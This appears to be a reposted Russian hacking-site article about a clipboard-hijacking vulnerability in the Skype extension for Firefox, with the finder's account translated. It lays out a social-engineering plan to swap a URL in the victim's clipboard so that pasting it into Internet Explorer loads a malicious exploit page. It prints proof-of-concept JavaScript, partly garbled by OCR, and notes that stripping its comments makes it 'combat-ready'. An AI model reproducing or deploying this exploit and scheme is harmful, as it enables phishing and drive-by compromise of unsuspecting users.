Название:
РАСШИРЕНИЕ "SKYPE" ДЛЯ FIREF0X ДОСТУП К БУФФ ОБМЕНА
Категория:
Взлом
Раздел:
Программное обеспечение
Просмотров:
 3324
Добавил:
Дмитрий
Комментов:
0
Автор:
Неизвестен
Добавленно:
  09.08.2012 в 11:45
Теги:
обмена, FIREF0X, расширение, БУФФ, доступ, skype, для
Рейтинг:
Игровая индустрия

РАСШИРЕНИЕ "SKYPE" ДЛЯ FIREF0X ДОСТУП К БУФФ ОБМЕНА

РАСШИРЕНИЕ "SKYPE" ДЛЯ FIREF0X ДОСТУП К БУФФ ОБМЕНА

Какое отношение имеет Skype к GDI+? Как можно эксплуатировать уязвимость в IE через Горящего Лиса? Оказывается - можно! Социальная инженерии в совокупности с систематическим подходом делают свое дело!
Седьмого октября 2008 на milwOrm'e появился exploit, написанный польским хакером с труднопроизносимым ником irk4z. Он демонстрирует направленную атаку на буфер обмена через Skyре-расширение для Горящего Лиса (https://developer.skvpe.com/SkypeToolbars), пользующееся большой популярностью и предустановленное на множестве компьютеров и ноутбуков.
Подробности - в блоге первооткрывателя дыры (irk4z.wordpress.com), кстати, до сих пор еще не засветившейся на Secure Focus'e. Наверное, это потому, что хакер изъясняется исключительно на польском языке. Мой перевод предлагается ниже: "Я нашел ошибку в Скайповом расширении для Горяще го Лиса, позволяющую модифицировать системный буфер обмена по своему усмотрению. Забавно, что данное расширение автоматически устанавливается инсталлятором Skype, так что количество уязвимых машин должно быть очень велико. Описанная дыра похожа на недавно обнаруженную уязвимость, открывающую доступ к буферу обмена посредством Adobe Flash и ActionScript, что позволяет атакующему манипулировать его содержимым". А где же здесь IE? А вот где! Скидываем жертве ссылку на сайт, сообщая, что его нужно смотреть только через IЕ. Пусть это будет какой-нибудь приличный сайт типа www.arcme.com. а мы тем временем незаметно подменяем адрес в буфере обмена и когда жертва вставит его в IE, она неожиданно окажется на www.free-shitty-hosting.com/-halyava/evil.html. где ее поимеет злобный HTML-код, эксплуатирующий одну из вышеописанных дыр в IE.

Цель:
Уязвимость подтверждена в Skype extension for Firefox BETA 2.2.0.95. Про другие версии ничего не известно.

Exploit:
Демонстрационный exploit можно скачать с milwOrm.com/exploit.php?id=6690 или воспользоваться исходным кодом, приведенным ниже (чтобы превратить его в боевую модель, достаточно убрать комментарии, заботливо вставленные автором):

<а href=" # " onclick="check_it();>test it!</a>
<script type="text/javascript">

function copy_to_clipboard ( text ){ if (skype_tool)  {
var copy_it = text + '\0+' ; //use null byte to copy value, because ' + ' char must be in string
skype_tool. copy_num ( copy_it ) ?;
}
}

function check_it(){
//copy_to_clipboard('malicious text!!!!!!!!!!!\n\
com/');
copy_to_clipboard('http://malicious.link.to.bad.
page/ ' ) ;
alert('Done! Check your clipboard! ');
}
</script>


Solution:
Внимательно следить за буфером обмена. Это единственное "лекарство", существующее на сегодняшний день.

Всего комментариев: Комментариев нет , Но вы можете написать первым
avatar